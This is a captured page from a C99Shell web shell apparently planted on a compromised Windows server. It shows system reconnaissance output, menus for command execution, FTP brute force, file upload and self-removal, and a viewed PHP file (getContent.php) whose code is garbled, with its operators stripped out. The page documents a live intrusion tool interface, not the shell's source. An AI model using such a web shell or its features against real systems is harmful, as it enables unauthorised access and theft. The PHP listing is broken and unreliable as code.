!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\xampp\xampp\htdocs\jaime\blog\   drwxrwxrwx
Free 8.8 GB of 239.26 GB (3.68%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     getContent.php (1.29 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
//dont forget to add ampersand to the end of the string.
    
$myFile file("profile.txt");
    
$length sizeof($myFile);
    for(
$i=0;$i<($length);$i++){
        
$myString .= $myFile[$i];
    }
$mytext $myString "&";
$strlen strlen($mytext);
$counter 0;
while(
$counter $strlen)
{
    
$piece substr($mytext$counter1);
    if(
$piece=="&")
    {
        
$px $x;
        
$x $counter;
        
$counter2 0;
        
$lenofcur $counter $px;
        while(
$counter2 $lenofcur)
        {
            
$piece2 substr($mytext,$oldnum2,1);
            if(
$piece2=="=")
            {
                
$y $oldnum2;
                
$rightl $x $y 1;
                if(
$morethenone==true)
                {
                    
$leftl $y $px 1;
                    
$fp substr($mytext$px +1$leftl);
                }
                else
                {
                    
$leftl $y $px;
                    
$fp substr($mytext$px$leftl);
                    
$morethenone true;
                }
                
$sp substr($mytext$y+1$rightl);
                if(
$fp=="name")
                {
                    
$name $sp;
                }
                if(
$fp=="title")
                {
                    
$title $sp;
                }
                if(
$fp=="age")
                {
                    
$age $sp;
                }
                if(
$fp=="email")
                {
                    
$email $sp;
                }
                if(
$fp=="country")
                {
                    
$country $sp;
                }
                if(
$fp=="state")
                {
                    
$state $sp;
                }
                if(
$fp=="ocupation")
                {
                     
$ocupation $sp;
                }
                if(
$fp=="template")
                {
                    
$template $sp;
                }
            }
            
$counter2++;
            
$oldnum2++;
        }
    }
    
$counter++;
}


?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--